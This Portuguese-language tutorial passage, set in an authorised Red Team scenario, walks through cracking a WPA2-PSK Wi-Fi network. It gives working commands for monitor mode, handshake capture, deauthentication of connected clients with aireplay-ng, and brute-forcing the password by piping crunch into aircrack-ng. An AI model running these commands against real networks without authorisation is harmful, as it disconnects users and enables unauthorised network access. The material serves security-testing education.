onde você utilizaria o aircrack-ng
para capturar pacotes e recuperar o handshake de uma rede Wi-Fi, e em seguida, usaria o crunch
para gerar uma lista de senhas que seria alimentada diretamente no aircrack-ng
para tentar quebrar a senha da rede.
Você é membro de uma equipe de Red Team contratada para testar a segurança de uma empresa. Uma das tarefas é avaliar a segurança da rede Wi-Fi da mesma, identificada como Empresa_WIFI
. A rede utiliza WPA2-PSK (Pre-Shared Key) para autenticação.
- Habilitar Modo Monitor na Interface de Rede
sudo airmon-ng start wlan0
Este comando ativa o modo monitor na interface wlan0
, permitindo que você capture pacotes sem estar conectado à rede.
- Capturar Pacotes da Rede Alvo
sudo airodump-ng wlan0mon
Identifique o BSSID (endereço MAC) e o canal da rede Empresa_WIFI
. Suponha que o BSSID seja 00:11:22:33:44:55
e o canal seja 6
.
- Focar na Rede Alvo e Capturar Handshake
sudo airodump-ng --bssid 00:11:22:33:44:55 --channel 6 --write captura Empresa_WIFI wlan0mon
Isso captura pacotes da rede Empresa_WIFI
e salva em um arquivo chamado captura
.
- Forçar a Reautenticação de Clientes (Opcional)
Para capturar a handshake mais rapidamente, force a desautenticação de um cliente conectado:
sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
Substitua AA:BB:CC:DD:EE:FF
pelo endereço MAC de um cliente conectado. Isso envia 10 pacotes de desautenticação, forçando o cliente a se reconectar, momento em que a handshake será capturada.
- Verificar se a Handshake foi Capturada
Após a captura, verifique se a handshake foi capturada corretamente:
aircrack-ng captura-01.cap
Você deve ver uma mensagem indicando que a handshake foi encontrada.
- Gerar e Quebrar Senhas com Crunch e Aircrack-ng
Use o crunch
para gerar senhas e passe-as diretamente para o aircrack-ng
usando pipes (|
):
crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 | aircrack-ng -w - -b 00:11:22:33:44:55 captura-01.cap
Neste comando:
crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789
gera todas as combinações possíveis de senhas com 8 caracteres usando letras minúsculas e dígitos.- O pipe
|
redireciona a saída decrunch
diretamente para oaircrack-ng
. -w -
indica queaircrack-ng
deve ler a lista de senhas da entrada padrão (stdin).-b 00:11:22:33:44:55
especifica o BSSID da rede alvo.captura-01.cap
é o arquivo de captura que contém a handshake.
- Preparação: Habilitar modo monitor e capturar pacotes.
- Foco na Rede Alvo: Usar
airodump-ng
para focar na rede alvo e capturar a handshake. - Forçar Reautenticação (Opcional): Usar
aireplay-ng
para desautenticar clientes e capturar a handshake. - Quebrar a Senha: Usar
crunch
para gerar senhas e passar paraaircrack-ng
para tentar quebrar a senha WPA2-PSK.
Esta operação combina a captura de pacotes e a quebra de senha usando ferramentas especializadas de segurança, demonstrando um exemplo de como uma equipe de Red Team pode testar a segurança de uma rede Wi-Fi.